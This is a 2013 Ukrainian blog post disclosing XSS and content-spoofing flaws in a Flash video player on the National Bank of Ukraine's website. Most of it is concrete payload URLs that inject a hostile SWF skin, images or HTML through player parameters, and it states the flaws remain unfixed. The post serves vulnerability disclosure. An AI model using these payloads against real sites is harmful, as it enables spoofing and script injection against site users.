Нові уразливості на www.bank.gov.ua
23:59 28.11.201314.08.2013
У травні, 22.05.2013, я знайшов Content Spoofing та Cross-Site Scripting уразливості на http://www.bank.gov.ua - сайті Національного банку України. Про що найближчим часом сповіщу адміністрацію сайта.
Раніше я вже писав про уразливість на www.bank.gov.ua. Стосовно уразливостей на сайтах банків останній раз я писав про уразливості на www.blog.privatbank.ua.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
28.11.2013
XSS (через Flash Injection):
http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site/1.flv&skin=xss.swf
В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.
Content Spoofing (Flash Injection):
http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site/1.flv&skin=http://site/1.swf
Content Spoofing (Content Injection):
http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site/1.flv
http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site/1.flv&pic=http://site/1.jpg
Content Spoofing (HTML Injection):
http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site&comment=test%3Cimg%20src=%27http://site/1.jpg%27%3E
XSS:
http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site&comment=+%3Cimg%20src=%27xss.swf%27%3E
В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені. Також можлива Strictly social XSS атака.
Дані уразливості досі не виправлені.